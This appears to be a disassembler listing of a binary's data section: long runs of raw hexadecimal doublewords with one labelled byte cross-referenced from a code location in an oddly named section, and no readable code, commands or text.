dd 0A2C30C9Fh, 43A07169h, 0AEA842AFh, 0D61E8C40h, 0CE199405h
dd 434B0E40h, 26ED02D8h, 60512E5Dh, 0CF20250Bh, 7EE071E0h
dd 659CCD36h, 29BA70FCh, 4C490A49h, 22AFC2C1h, 4066C72h
dd 574CA006h, 5C57281Dh, 60B191E6h, 7888B8D5h, 0F9575D70h
dd 0A4322E8Ch, 8F4A5635h, 0F407C55Ch, 88D5697Fh, 815442DFh
dd 9F8787DAh, 0C8E038EBh, 15D9F9ADh, 0F03C164Bh, 71F705Fh
dd 2550A13h, 0C487186h, 86947AF0h, 0BB0E31Eh, 614F03BBh
dd 0CFA6925Dh, 1EA4B90Dh, 27053870h, 4A291AB5h, 0D2C32671h
dd 6A2441D1h, 82192B3Ch, 64D4C1C1h, 49D5576Ah, 56401F69h
dd 0A2FF4124h, 3F0BB708h, 26545F4Ah, 8ABEFE28h, 0ABD5DC80h
dd 0A6BA073Ch, 5F2189BFh, 776BB898h, 29D70556h, 66289484h
dd 257B7C8Ah, 572017D6h, 171BD7C9h, 0A7034FCCh, 5F0C1C26h
dd 14C7C1Ah, 785BBF0h, 0FBC79884h, 3ABEB94Dh, 8B813487h
dd 8A04B181h, 0BD72FD9Ah, 0E2E8C872h, 0E1EDDBDFh, 37C83F7Ah
dd 0E6FE07A5h, 0F1E6A9D0h, 53DAA6BEh, 38AF84A4h, 0CCCCA8Ch
dd 0A7D09996h, 99578A9h, 0E7D994BBh, 0A133A79Ch, 833CF7FDh
dd 0B0577954h, 6D609D2Ch, 430197DCh, 0CCFBB56Ah, 2A3DE181h
dd 36A665BFh, 0E41593FBh, 0ACF1084h, 870414A6h, 0AA82A57Fh
dd 0A2B0961h, 3AA4EBC2h, 0DDCB7DBh, 0F260110Fh, 0FA262702h
dd 7075FF83h, 4E5F06FDh, 1CAF7C06h, 0CA2AFEBEh, 0FFCD1F0h
dd 5848AB0Eh, 25B5AB97h, 0B14D8570h, 0F37297DEh, 2CCFFE25h
dd 0F482ACh, 196950A5h, 39855151h, 0B35A1995h, 0B41DB9E7h
dd 0EF20D514h, 17377A79h, 9E600677h, 0C3AF9438h, 9BC8D349h
dd 505C2B0Bh, 9F4A66ADh, 0DBC2BDE9h, 14A484BBh, 0DC10E61Fh
dd 0CE6A433Eh, 0AC457C97h, 7FEBB08Bh, 728FC12Bh, 0DE8C5FD8h
dd 0AE451451h, 0E921BAA8h, 8AF9157Ch, 86E0EC37h, 6A73543Fh
dd 0BC23EC36h, 40BE8DEh, 62D0488Fh, 44E7C45Ah, 0C46E1A9h
dd 5357009Eh, 0A0EE202Ah, 0D8B94558h, 4EA02ECEh, 4E3C23C0h
dd 4B4BA4AAh, 42F800CAh, 0ABA9ACAEh, 8C411752h, 0A0CFF501h
dd 6180FFC2h, 0F5D0600Ah, 177143D3h, 2E6654AFh, 0A3E9408Ah
dd 33B2E433h, 885FF574h, 0F4FB62FDh, 630A26EBh, 0E022FCD6h
dd 1BF3D903h, 37286888h, 286E40FAh, 307374ECh, 7680F083h
dd 0D1D52163h, 20F3D384h, 8AB5EF2Ah, 661E68EFh, 0A96AD690h
dd 1752FFE5h, 42668154h, 1DF17D15h, 0EE3A5679h, 0E9365617h
dd 0D69BAF8Eh, 79D05FF3h, 5B6FBAACh, 12E9FA88h, 0E8C1D92h
dd 0FBFFD40Ch, 5E2199E1h, 543F4A82h, 0A0E238B8h, 0A92E6D01h
dd 37094B9Fh, 0BA10EC39h, 82E0536Ah, 20C1717Bh, 0B21CF6DBh
dd 35BEFEC4h, 946E111Ch, 0C3CA6934h, 0D7445512h, 51EFD20h
dd 0E86F6FE4h, 4EEFC43Bh, 3EDACA0Ch, 19803D53h, 6042BF48h
dd 5D49255Dh, 23D88BA8h, 0D8035160h, 9536A4A1h, 6137055Eh
dd 6695E0h, 0E2FF5DDEh, 9CEA910Fh, 0E77481BFh, 0FCCA5CEFh
dd 59E9EE2Fh, 1D579914h, 97FE7497h, 0D2FFE245h, 0AFC42050h
dd 0D05FC42Ch, 0CC6B0F41h, 8AFCF995h, 12C522FFh, 576BC651h
dd 0B1BB6A0h, 2EA29C6Dh, 0A0EF4DCAh, 5DF5BA62h, 400F491h
dd 3CEFB6C9h, 0EAD3CE24h, 7594C214h, 96BAD761h, 0A8188512h
dd 0C1314CCCh, 0E1AB14A6h, 6866A5D5h, 884583F1h, 528E8582h
dd 745AD386h, 50121710h, 3013EBF1h, 89E4E6F5h, 55DAF3C3h
dd 620A8491h, 7600A2D6h, 87D070DEh, 50933A8h, 5FE0C3Dh
dd 300C267h, 1FBE6049h, 9404CF52h, 133F314Fh, 0C7D41937h
dd 2CB8B092h, 0B8B0C4E9h, 1B0D7AA2h, 0B1B4C038h, 403D9A42h
dd 898B48C7h, 0A75F45C7h, 566553B0h, 8E4AEE2Dh, 10145EBCh
dd 0C61DAE96h, 7E14A301h, 0EB621A92h, 67AE8532h, 0A7C0FF0Ah
dd 99B2F18Ah, 9478701Fh, 0C4D1AF1Dh, 1901199h, 17517784h
dd 1EBAC5FEh, 4CCC593Ah, 0A64DD834h, 0E7AE4311h, 964BB002h
dd 52D9408h, 85BA514h, 0D0BC25A8h, 2158CB4Eh, 0BD72169Bh
dd 0F996BAC5h, 5A1F138h, 0C2D6950Bh, 0BB965D2Ch, 3F5C18Ah
dd 2028821h, 6986C584h, 3F7E8024h, 6A69F403h, 0E02FB831h
dd 5910940Ch, 7802B035h, 159177FAh, 46168F99h, 4C1BA756h
dd 60F8540Ah, 97E000C8h, 0A1751045h, 84315CFDh, 4520E471h
dd 4EE97F13h, 430349E5h, 8A84082Bh, 602A8FDAh, 3E5C1006h
dd 2DCA0358h, 0BA48066h, 2C65491Eh, 297BD408h, 0BD8AA260h
dd 597754C2h, 0AA924229h, 0EFB9BCAh, 4BEBA514h, 99F66A49h
dd 14C003CAh, 7A8B2C58h, 0A778A53h, 1738A779h, 412E9C8h
dd 1F033084h, 0DBB4DE6Bh, 7D6822Ah, 0F340A20Ch, 592B3024h
dd 0C01690B5h, 44BE13BEh, 4064501h, 0FA703A1Bh, 391AB3Dh
dd 94C3028Ah, 341BB681h
dd 42083F50h, 825F1905h, 0C206131Eh, 0BD19EE2Dh, 8109272Ah
dd 841A577Fh, 7A4B2D43h, 0D8472D6Ah, 0C8FEEF75h, 0B09711A1h
dd 31134B6Eh, 440A60Eh, 0DD623435h, 9F463D95h, 0AAE02B1Eh
dd 37D0AE79h, 2E7F5CEAh, 38F7CB8h, 4E74DBB0h, 3D0A5D1Dh
dd 0F1A0347h, 5674628h, 485F0EEh, 0EF2A9311h, 3F50E34Bh
dd 0EFBD0BE8h, 3688EA65h, 0F58EC6FAh, 0D0D39875h, 0B59E5A2Ah
dd 0D75D2A38h, 42982C72h, 0A7EC7219h, 46740DE3h, 3B444714h
dd 0B9A80F0Bh, 5C217394h, 29B020B3h, 0CE2898F2h, 0B09EEE88h
dd 9E9F2831h, 741A5759h, 0BC2CB370h, 0E35BD951h, 69E51BFh
dd 3A7E2432h, 580495F8h, 7D6F2FFDh, 0A980C7D9h, 0AA3124B2h
dd 2D6F85E8h, 0ED49E62h, 903BA760h, 0EA7D6020h, 0B2C42B35h
dd 277420C9h, 0ACEA64B5h, 8A145403h, 4E8E38C6h, 1B82494Bh
dd 0A3D7B38Ah, 6545C840h, 0E8320E6Bh, 0CC0F0037h, 74387E3Ch
dd 0A1A7C975h, 416C8250h, 968A9831h, 0C0C91C1h, 26116504h
dd 0D8A51540h, 149C8E23h, 818346A0h, 0F95286D3h, 6B9C7D45h
dd 271F00D2h, 4E6D57E2h, 25D37E3Dh, 0E38EC0F7h, 0ACEF406Ah
dd 5F9C53A8h, 479938FFh, 0FF996A3Dh, 0A11BC2C5h, 4747CB6Eh
dd 2513A439h, 0C1B13730h, 12927E71h, 14BF027h, 260BE949h
dd 0E3E09DD6h, 87E3109Bh, 0C46AA90Dh, 98A1AEE0h, 0F2D24175h
dd 3A577B6Ah, 8C56072Dh, 51207D1Ch, 9F8969F4h, 8182F42Eh
dd 1B68D2FAh, 0B9786632h, 2EBB567Ah, 8A0C5E8Eh, 5498E013h
dd 0A90C09B8h, 2C45815Fh, 0A1362471h, 0BE541760h, 46687FBFh
dd 17DDAE8Ah, 0BB860E1Bh, 93F4B185h, 0D62DC34h, 2187BFFBh
dd 0A6CFEB6Fh, 0CB32DDB4h, 4A04A4F6h, 6051BB21h, 1D728BACh
dd 30C18928h, 982E9F59h, 0A990FA23h, 927C68Dh, 0D41FD7B0h
dd 8F20FFE5h, 0FC406260h, 0F23942A1h, 6D070921h, 0CC2ED67h
dd 0E53F5FD3h, 5B4FDFDCh, 0FDEDD4DFh, 0F6406409h, 289C8B20h
dd 0E3BEA2E3h, 7BACE51Ch, 7738339Fh, 82F11F1Bh, 530A079Eh
dd 0EEE0F9A6h, 960DC28h, 0DBA94E2Ch, 5A3727D5h, 73066D91h
dd 0AEDF1B0Bh, 0F0CB5907h, 0D3C98AAAh, 91845AA8h, 28876DD6h
dd 0FCDE95Dh, 0F68DE1D8h, 0DCE074C4h, 3EB03AE8h, 13368778h
dd 779410E1h, 0FF9477A1h, 0DFA04A8Ch, 8BE78536h, 16E30C3Bh
dd 80C7A885h, 0A186AFF9h, 28F46ADFh, 95448446h, 0D2F5ABAFh
dd 51464A65h, 3829C742h, 55E38027h, 0ABF312Ah, 264E981h
dd 0B899288Dh, 0BC2A308Bh, 8B158BF8h, 2566170Dh, 76CB5465h
dd 86E4E3EAh, 6480138Ah, 0F0E1952h, 0C4BDFAE2h, 108E3DD8h
dd 35DBDF4Ch, 0FDDEC05Eh, 0E947B180h, 0C16A01C6h, 6087020Ah
dd 3C9012EAh, 4696D489h, 40AB148Fh, 8B404568h, 5BD740D5h
dd 0E5E25CF0h, 97ACCF76h, 4AA616E7h, 985605C4h, 0AB39D6Ah
dd 23CC1BBh, 69CB3682h, 407F748h, 25196FD2h, 22848560h
dd 312D2ABCh, 0DA3894D4h, 77E08794h, 0FE930D8Bh, 0A75BB2E4h
dd 9440BFF2h, 0E856297Dh, 0C2CD2970h, 71C80149h, 6CCF1CA6h
dd 9A2DBA42h, 0C112D322h, 0A9CCC622h, 4AFE4B8h, 26DAD755h
dd 32E94998h, 2D70CCA1h, 67487DDCh, 0F31E7EDCh, 0B22E18E0h
dd 19B8CD46h, 0AE7094F0h, 19B617A4h, 0F7553C14h, 710F1E2Dh
dd 15CB66E2h, 58E6C6E3h, 7C209652h, 32EB1DD2h, 0BD747C1Fh
dd 0F0857A87h, 6803B5D0h, 0CB283680h, 0FE183981h, 2C4DCFE2h
dd 0F7579AA8h, 0A5744493h, 0B34144D5h, 0B855AB31h, 6DF72AE1h
dd 0CC1F2664h, 53D76DAFh, 0E9EA8FBEh, 43E80769h, 7F08331Bh
dd 39CB6660h, 17488886h, 45A52F07h, 0A8A22B69h, 14A90D90h
dd 63D3FA67h, 55ED5E6Dh, 1622ACBEh, 0D4DEEABEh, 699DEA4Ah
dd 23A882EEh, 1A38143Bh, 1BED78A0h, 758D294Ch, 91493165h
dd 8D34FC63h, 1BE94A34h, 19AB5EB9h, 0F03F2149h, 0D7FF707Ch
dd 50115CB6h, 0EDB03C5Ah, 19609F33h, 0ACD8B4F8h, 0BE478D97h
dd 8792498Dh, 0F5E1FA0Dh, 0F3EF5454h, 0CBFB5B01h, 465D01A0h
dd 0C845E3E3h, 0B884E4CBh, 0B265517Dh, 5C5532Eh, 0DD8687A7h
dd 0A0CA3211h, 0B11246D4h, 0C8132E4Bh, 27C603E7h, 6014145Ch
dd 3FD4E076h, 75ED5E65h, 99E5374h, 0D28E0B5h, 18FE5676h
dd 0D6BEF3BEh, 0F5D6836Dh, 0E064DE38h, 9C804651h, 0AA432613h
dd 83B19295h, 0A0DC61A8h, 0DE20A858h, 5363760Ch, 69C936E3h
dd 0E1F55F87h, 41704442h, 0C4D66BA1h, 0B791228Bh, 0EDE4DCF9h
dd 241052EFh, 0B63604F4h, 78543B8Fh, 0F80A0B34h, 0C42C388Fh
dd 93644E1Ah, 1A34AEC5h, 175E9A04h, 7FA6E7h, 0CE20DA2h
dd 37110709h, 7D8CEE34h, 0BBF30C42h, 576A46A8h, 0AE23950Ch
dd 33CAD95Ch
db 0D2h, 9Fh, 0A8h
byte_460667 db 41h ; DATA XREF: ut7h7i2x:loc_43DF38o
dd 0B17B106Eh, 561F833h, 0E2DAE7C4h, 81B4E55Dh, 0B8B5AB6Ah
dd 6DF24D2Ah, 0FCC24879h, 50D62F7h, 6A0F22B7h, 419C1CFh
dd 607FD044h, 79B52309h, 63687FC7h, 0E82427E0h, 47A5A076h
dd 0F6707771h, 95574A9Eh, 7037BE5Bh, 0CDD9D595h, 5ADF155Eh
dd 46AD5579h, 0C6825442h, 80486A23h, 18AFD56Fh, 9AD1AAF4h
dd 12DF5AB4h, 0FE5D2812h, 50F7B812h, 5411E321h, 0BA777F3Dh
dd 484F3072h, 69C3E80Dh, 7DD32B37h, 19AA0687h, 0AFC3B81Fh
dd 4822CDCBh, 454445A2h, 7F57B2BEh, 0A22D30BFh, 3ECA70E5h
dd 0F6B4EA34h, 86A7F731h, 0A9E34802h, 189A5509h, 8A1255BAh
dd 0FD687F60h, 20234C44h, 0ED208848h, 0A51D79F8h, 733B1224h
dd 768834BDh, 96E757D1h, 0C8FECF44h, 0B52FBE53h, 452AA120h
dd 44FFA9E6h, 0CD970599h, 0D554CD9Ah, 1D044AD0h, 0A2802B31h
dd 0A3D2BAEh, 8AA8AB7Eh, 7D38B974h, 0D1FCEEF4h, 0D957D45Ah
dd 0A2552Bh, 6FE3C245h, 0A8EEB2AFh, 0F39BBFDFh, 0ACBAB76Bh
dd 0A2700746h, 554D01A2h, 4500C26h, 2D47F3BCh, 822C2757h
dd 2EFD7E1Fh, 0F4FA0B20h, 9CEA3D8Ah, 0A8D33BF3h, 460094C3h
dd 0AE801CBBh, 0AC4E30CBh, 49DBE2Ah, 4BA53E2Dh, 38307408h
dd 7AA9FD56h, 62A8575Ah, 260ADFFEh, 10771049h, 555A7824h
dd 7E8C531Ch, 0B5D66031h, 9083A8Bh, 6A2028D8h, 1D385210h
dd 0EB08C10h, 877FE7A3h, 0D5C5D58Bh, 0EB89E9C7h, 49E0C435h
dd 9724AFC1h, 3137883Fh, 85A5242Bh, 0E3F6E823h, 30AB7D7Dh
dd 8B58E16h, 13BFB2D1h, 0D70F7FABh, 91768625h, 0EB7ECAAFh
dd 65DBD2DCh, 0A349D450h, 17FA4C9Ah, 1E2AD345h, 4BE312AEh
dd 3C6C75BFh, 1682395h, 362A71D4h, 8E44192Eh, 921990EAh
dd 0D83605F5h, 49DF7C19h, 7DF87A74h, 20BD5F13h, 0E3F83BE1h
dd 8D253404h, 74E7A479h, 5A024D51h, 4928284h, 0E87E8282h
dd 5FF305C0h, 2F743114h, 0E131F9CEh, 62F89FA0h, 86A17589h
dd 0E6D65F7Eh, 0FF36C8D3h, 7F65C9E2h, 0E9EE8910h, 43BE5216h
dd 252228BCh, 0C553D478h, 0FCCE976h, 0BA67E0B8h, 83C128CDh
dd 2210D29Ch, 0FFD8B3Eh, 0E0F70F94h, 0C7CE34DCh, 1D05F9FCh
dd 702E3512h, 86A4080Ah, 430A62A9h, 2980A15Dh, 0A02169F2h
dd 4C92BEFFh, 0B2445302h, 2465C2AEh, 8A046932h, 324D1228h
dd 0BCA6CC0Dh, 0C3A40A5Bh, 0DF83FA01h, 148A6EA0h, 0DF47E986h
dd 695DE1Ch, 8C87CFC2h, 0BCD0F7D1h, 9C8874AEh, 0FC402D9Dh
dd 15043F0h, 0D120522Bh, 847000C6h, 525CCA12h, 0F1700131h
dd 24EAD74Fh, 0AD6A28B9h, 1391640Fh, 96847D30h, 76F6F4B8h
dd 0CBF3413Dh, 6456F7C3h, 25A82F91h, 0A3E89D85h, 3299D567h
dd 0C972A6E2h, 0BFB09885h, 0BD2E2C2Ch, 71F026Ah, 0CE82A198h
dd 822B4519h, 828EAEA4h, 6296AC17h, 0F38071DCh, 0DAC00553h
dd 6DCB907Eh, 0FC295150h, 3718F3Bh, 7D04844h, 78EE4A73h
dd 3C8D7F6Fh, 0AE032A03h, 0DBA43519h, 7A35330h, 34D73311h
dd 0A95CD071h, 44EFCAFBh, 8BE30C1Ah, 0E2F89173h, 3300682Ah
dd 8399D6E1h, 6858D5C6h, 0FE02F59Ch, 4ECCB5B7h, 0F51C8A11h
dd 93C4119h, 380AB9E5h, 350A752Eh, 0FA9168B8h, 488C5Ch
dd 93EB1A75h, 0F51D3299h, 8E43121Fh, 154D4DC8h, 0A6414313h
dd 0B92A3988h, 0D1D6A0BEh, 9B408847h, 0C180CF01h, 0BD18BA90h
dd 0F0C4085Fh, 20608DB5h, 429C05F8h, 3F04D1DAh, 97A8E84h
dd 0F8A3681Ah, 2EABE2A1h, 88175650h, 640D0E10h, 0F8F2ACB3h
dd 853B7962h, 930AB504h, 827291B8h, 9F8A88A5h, 78830086h
dd 0DD594393h, 9E1F3A4Fh, 0F5A862EDh, 2097DB1Fh, 0FADC087Eh
dd 0F040F898h, 0C06EA1D4h, 6C042740h, 83B0770Fh, 53956E9Eh
dd 6240DF65h, 0D43E0FDFh, 0EADEF9FAh, 541AFB0h, 481BBD5h
dd 0D86842EBh, 0E77DFE1Dh, 0A5248597h, 240B8FB6h, 82DFA389h
dd 0A8B81151h, 0AA2C2138h, 2C0E2A1Ah, 0C926C402h, 0B88EAC1h
dd 0B1993F2Bh, 0A55097DFh, 97E36DC2h, 3E0A6DA7h, 0CBA7C256h
dd 57066D10h, 0B4D95311h, 295C036Fh, 0BA05E9FFh, 0B0EB5062h
dd 0DFC00E99h, 6D72ACD1h, 0CB82959Dh, 0A4319A78h, 150EE4ECh
dd 941B754Ah, 0BAF4FB1Eh, 14EEACBEh, 777A427Ch, 0E5436818h
dd 60D6CCACh, 0A89092B3h, 0DD8873A0h, 8AE63581h, 151F875Ah
dd 0ADB2DE10h, 0B06098D2h, 24A5C052h, 9270BEh, 0AF641C95h
dd 0C6389DB0h, 652E15F6h, 6D222667h, 7105721Ch, 0B9D042Bh
dd 2811D121h, 72C7E3ACh, 0C60C08ECh, 4B0E5864h, 81631520h
dd 4D6A6406h, 4E952FF8h, 938AD225h, 0F0A7364Eh, 1458C5F7h
dd 87D069AFh, 137E6915h, 0A1C6F220h, 342B5292h, 58BD09C9h
dd 5816D729h, 0BFC820ECh, 107158C1h, 0AC68F30Ch, 123013A3h
dd 8D50B469h, 0D083A479h, 41BC5058h, 75982219h, 4C298C5Bh
dd 742C9838h, 169C0F3Dh, 16BC3696h, 0FF8CB54h, 94EDEF7Ah
dd 2AEA60E3h, 0B50B3009h, 41568E45h, 10DB43BBh, 455F5F61h
dd 79B87F28h, 4753BAC7h, 4D562319h, 0E874AFCAh, 0B8FE8B3Ah
dd 93D7E746h, 7569DB37h, 0FBB7166Dh, 8BCAC3BCh, 255A5FA0h
dd 38DABA19h, 0FAD5AE09h, 8A0B69A5h, 25D21637h, 0D8B9C363h
dd 135304A0h, 0A0E96E4Bh, 444500A4h, 4ED4B89Fh, 7D8A762Ah
dd 0D2800673h, 0BE725D1Dh, 497F2D02h, 0C5724066h, 8F3FE1E2h
dd 0FA03A78Ah, 0AB88D4B5h, 517783DCh, 9DAF3183h, 20BAD64Ch
dd 0DEC8B54h, 8783EAC4h, 0B1025E9Eh, 320922BAh, 0F82170C0h
dd 841742C1h, 0A3FA0BDAh, 550151Fh, 0F230F8F8h, 592A26Ch
dd 3055F090h, 43B2B390h, 0A4BE1DC7h, 2B341F8Ch, 2792B042h
dd 0CDD29400h, 95051AC7h, 0E8EF5A18h, 521424C2h, 5F829E04h
dd 0D21A8934h, 9F08BC5h, 81256B0h, 21418449h, 0EB13C411h
dd 0D0E0B866h, 206C0BD2h, 63B69B82h, 3631AD1Ch, 62283C85h
dd 2CA6DDE9h, 4EFBD287h, 9748DE19h, 0F1DC7060h, 0CD1941ADh
dd 0BEE71FA6h, 4893E252h, 0FC01E06Ah, 85291C51h, 0BBC0F3DFh
dd 93C0005Dh, 0E774C193h, 0CE32AE54h, 2272D8A5h, 7293D654h
dd 0EF95A409h, 81E98A04h, 0F7457690h, 374F95F6h, 900D8A8h
dd 0CD417FA8h, 0EB251D3Bh, 0E2AC7862h, 0F5E55EBAh, 3ECB2443h
dd 0DF096290h, 411FE710h, 96708CD4h, 9F2FE5Eh, 9AF1595h
dd 0F5D18224h, 5DCD8C0Dh, 2C9C9EC0h, 765C371Dh, 17D8943Dh
dd 2AAAFD4Ch, 0D1425120h, 38887425h, 224989F3h, 3FB96281h
dd 0F8CE02FBh, 0CFB98940h, 0A44EFE60h, 48206529h, 885202B4h
dd 1CFE7F71h, 3125FF60h, 6BE73894h, 62B83053h, 305A01D1h
dd 0DA520A27h, 4E0F02EBh, 4D81D05Ch, 17A68C0h, 0F69613D7h
dd 551AEAEBh, 16551595h, 0BFE9A50h, 0BACD0BF2h, 11455FB2h
dd 3F204423h, 43F65E28h, 0FEA19FAh, 1ED387F1h, 60951FE4h
dd 64E70A4Dh, 97E985FEh, 0D2294690h, 0F084D7CBh, 5350BA77h
dd 0A71950E8h, 0FCC6BA24h, 3E6E5B44h, 14B350FCh, 0E8DA27A7h
dd 9959819Bh, 0E682A055h, 7376034h, 0FD506D28h, 0D2B0A960h
dd 4CBA5024h, 94A28186h, 261F5C4Eh, 3FA38104h, 0D90085EAh
dd 504E5CB9h, 0BB07EF72h, 7B058247h, 0A89C6D3h, 0C7AABBEh
dd 0FC3C5818h, 0EB6509F6h, 68E0CF82h, 0AAB8A058h, 0DC072448h
dd 1AB284B2h, 4E60733Ch, 9F8A44F0h, 658A8907h, 40C21095h
dd 40966665h, 0E1B2F5E6h, 2F3F381Ch, 0ABE33572h, 61B98A6Ch
dd 0BA0665D8h, 0BD7DC40Bh, 0EA33184h, 4C327618h, 269BD284h
dd 5D27CBE5h, 4C004FD6h
dd 704E5CAh, 0F7A53240h, 0B86AE227h, 8822BF6Dh, 840119B4h
dd 0B9166692h, 3D843645h, 507B271Eh, 3B0F60D8h, 9DAE74B4h
dd 0E0D3B8FDh, 505DB765h, 6D9D2FCEh, 630EFA7h, 0DF98AC0Fh
dd 0EAFBB57h, 0ECB2643Fh, 9402274Bh, 0A6A56AF5h, 0D6812D48h
dd 0CBA5AE78h, 5358B994h, 0F222EC0Fh, 24C9E025h, 8186152h
dd 0EE82E17Eh, 8012F511h, 20E95EB8h, 6AC0F311h, 0F05A7212h
dd 4B85C537h, 0A8792CA1h, 45FD3AF2h, 49C67F85h, 0D4989759h
dd 24F7BAC2h, 6DEE908h, 204F68BFh, 0A7E81D7Eh, 0C892FC41h
dd 344AC808h, 235695A5h, 8767A97h, 40468524h, 35E0496Ah
dd 0A583AA06h, 0F8DF11B3h, 4AF192BBh, 2E5D280Bh, 1DDC3A30h
dd 7E1553CDh, 0ADC4071Ch, 10537F00h, 0D842F684h, 9DC24868h
dd 0D51B15F7h, 0E17F6621h, 1053497h, 0E4922B3Dh, 31D380C8h
dd 0F913EAAAh, 0ABC62F63h, 0D2F15FA5h, 0B9AE168h, 20975D23h
dd 94C9D44h, 0ABD77EC5h, 54D957E2h, 0D90272ABh, 5222B0Fh
dd 0BB963BB9h, 0E490A1ECh, 863981EAh, 0B9F8F822h, 5402331Eh
dd 65DCAB6Ch, 0BDFF3F01h, 894401C2h, 990907DBh, 48BEBD43h
dd 5D7BF09h, 3536DC39h, 0F8E9DA06h, 3CAE41D0h, 34507DD0h
dd 0E2D0E0DBh, 275DBEB3h, 23AEE730h, 1756B065h, 6893FCBFh
dd 389DAE68h, 0E554E5F4h, 97995904h, 0AFB7E724h, 0F04A8EC5h
dd 53BE0CC1h, 0DC7740FBh, 9C275DCBh, 100D8004h, 99C16382h
dd 99E28FA6h, 0AFCD55C8h, 0D5C7B214h, 1E50A2BAh, 0C141F194h
dd 33E710FDh, 9011015Dh, 0EF2771Fh, 95819529h, 40A4AECEh
dd 122F5F61h, 0BFC530B8h, 700CE0E8h, 0C340F617h, 0B3C050D9h
dd 0C0FF45E7h, 0BDF61AE8h, 0E4C333BEh, 0AB98496Bh, 0E6100E5Fh
dd 0FF1D3B24h, 3EF0CA0h, 3BE94427h, 4A86B4C5h, 3805DF3Ch
dd 0E0052145h, 0EB09D824h, 8B600592h, 0D75EE3D1h, 134C4B7h
dd 28949EE4h, 451410F0h, 4FA7E9EEh, 530AC222h, 9EE3B934h
dd 1224892Eh, 8F45514Ch, 90E97A7Bh, 120E30C8h, 2FFDEE49h
dd 93C19629h, 6712D8C2h, 0B88E6E9Dh, 51033A0Ah, 91B6372Dh
dd 75584C5Ah, 2D45268Ch, 1272B454h, 24EE55CCh, 81D9EAA4h
dd 0B780E06Dh, 0E68262E6h, 5D453551h, 50B4EFB2h, 0E1080947h
dd 0CE9A905Dh, 0EC885D25h, 7C902490h, 0E5386C26h, 0CBB92887h
dd 5A6A38BFh, 40686D93h, 7D30E9ADh, 980CC4BDh, 0BAFDAD83h
dd 439F80B8h, 23A257DEh, 0CBCDE39h, 4A03E433h, 0DE24CEFEh
dd 21BC98EFh, 0E4F4617Ah, 0EAF41509h, 71A53E28h, 57790B56h
dd 0FAAD60C7h, 55C696BAh, 295D5045h, 55638B57h, 61DDDA8Ch
dd 5B20727Ah, 5D01B1AEh, 5979955Fh, 4F08C4Ch, 0F6A8E92Bh
dd 2EE77F25h, 0B1830D54h, 556A7C30h, 743EDD29h, 1DB9AD41h
dd 0B4E379F5h, 7F597760h, 0EBBCC120h, 0BBB6C47Ah, 63A0FF89h
dd 3FC75A62h, 1D565C5Eh, 0CABC82D2h, 0C2507FEAh, 9602A570h
dd 0BD7E7A98h, 0E7EBE6B8h, 131345A9h, 22ACF2A6h, 7E449A2Ch
dd 0CE3C3907h, 0AE90EAB0h, 3B800439h, 62629577h, 0E6025882h
dd 0A1106AD9h, 7B337CA1h, 866809A3h, 0EB9E4A1Bh, 0EEE8C09Bh
dd 1F537FE0h, 21B85442h, 0BE10B131h, 1316663Ch, 0E3BBD465h
dd 5A948983h, 831E6F4Bh, 0C428D070h, 3B6AA296h, 510BBC61h
dd 5FE4FE4Eh, 0A9C0A4C9h, 71712EBh, 49BC7EE4h, 0C13898C8h
dd 0FBBEF894h, 0DA2BD42Fh, 9FF79FF0h, 0A5BC37D8h, 41F08614h
dd 0E7CE0B85h, 0C60CCA92h, 0FA219C53h, 4294FD05h, 87FE210Dh
dd 194354C8h, 220502A5h, 84655F4Eh, 0F96A46A0h, 2B8C72E9h
dd 67AEE493h, 7E18B47Ch, 26418AFEh, 6C8609C0h, 84D81DFBh
dd 0CD89AEB6h, 312BF362h, 0EB49747Dh, 15709EABh, 0EFD51F78h
dd 0B3117F20h, 0E86127C5h, 10D04FEAh, 2B4A91Ah, 6CAC752Dh
dd 15C77C2Fh, 6646F429h, 434262A0h, 0E6DDDCABh, 6EA7A1B7h
dd 88DAC0F8h, 0A0DA0681h, 0F595060Ch, 8D892A8Eh, 0A864E199h
dd 1005E408h, 3382818Dh, 602C675Ch, 6CDB14Ah, 39C51DB9h
dd 17C31756h, 5F929E57h, 23B526ACh, 95F0A9E2h, 2B77CBF9h
dd 5135C334h, 0F3254BF5h, 461F843Bh, 658079Ch, 0DC28C21Ah
dd 7153A161h, 4FA0BBF2h, 2D4E7DB0h, 26D384F8h, 727F1C8Bh
dd 0FE7D5EEh, 31C373A5h, 0EA70D175h, 2C6C2EFCh, 0BACE7CF0h
dd 6716121Eh, 541DE4D9h, 0D929F4A8h, 7FEF9B5h, 990563FAh
dd 8FD8ABD5h, 0F4D7CA46h, 2AFDFA90h, 0D745E003h, 0E0A8F640h
dd 0D81AD47Bh, 714892D0h, 660B5A77h, 76D5C5CFh, 0E1DAA831h
dd 0DBACFBE8h, 0D715A055h, 8E3CB7FFh, 969DA523h, 27E21423h
dd 0FE2FBD72h, 0D271A6C1h, 0C4EA0AA8h, 0F3B7460h, 578FCDA0h
dd 34C32D8h, 0F946A719h, 0B669742Bh, 17C6DE32h, 0A07CCC7Bh
dd 8C5DBA43h, 0E7C5024h, 68937F2Ch, 0AF8C86F2h, 0E2818404h
dd 14250D7h, 134050ABh, 4CAEFA55h, 7D55EDF4h, 6E1A7CECh
dd 0A7485CEEh, 0AAAA0FB9h, 1209C1D2h, 7D78EC50h, 0FC049088h
dd 870AA255h, 62C0475Dh, 2789E014h, 9CE145F7h, 13BEC0A4h
dd 6706FAEBh, 482AFAh, 34656EB8h, 5C149E22h, 0F2F80FC2h
dd 0B0F4397h, 5BE8550h, 606CA7ECh, 6E64C3C8h, 1CEE38F2h
dd 0BB835419h, 4A3647DDh, 6AAFB405h, 4AECF1C6h, 2F3EFF6Fh
dd 5DAD388Ch, 955FE705h, 8AB7AF96h, 16971D0h, 5F1F99BFh
dd 51F7DF1Ch, 0C7605A01h, 26F3962Dh, 63BF248Bh, 0FAA2AB45h
dd 0EAFB8368h, 9A815254h, 8773FA77h, 72E9BB0Ch, 0F0CA8C69h
dd 0FD0D0DC2h, 237DC27Eh, 0B3FF1DA0h, 2C56760Ah, 1E038B2Bh
dd 46BE4CCAh, 49A00CA2h, 10C0BFBh, 25581141h, 6FE9280Ah
dd 4048E824h, 238D3303h, 5A7D1C85h, 2A93F53Ch, 759E70BCh
dd 0BF8632EEh, 3E5F0881h, 100C266Ah, 57797EB0h, 74953579h
dd 60F8605Dh, 0BE9F2105h, 884019C2h, 92816D78h, 0C820D763h
dd 0CDD2149Eh, 4203B938h, 12242A62h, 87D7D0E3h, 0BAD34839h
dd 0C2C51845h, 955AE4EBh, 202BA2FEh, 5023E8B1h, 57AE06D5h
dd 0B38B17FCh, 120B910Ah, 0D65CB581h, 0C1575735h, 47351D86h
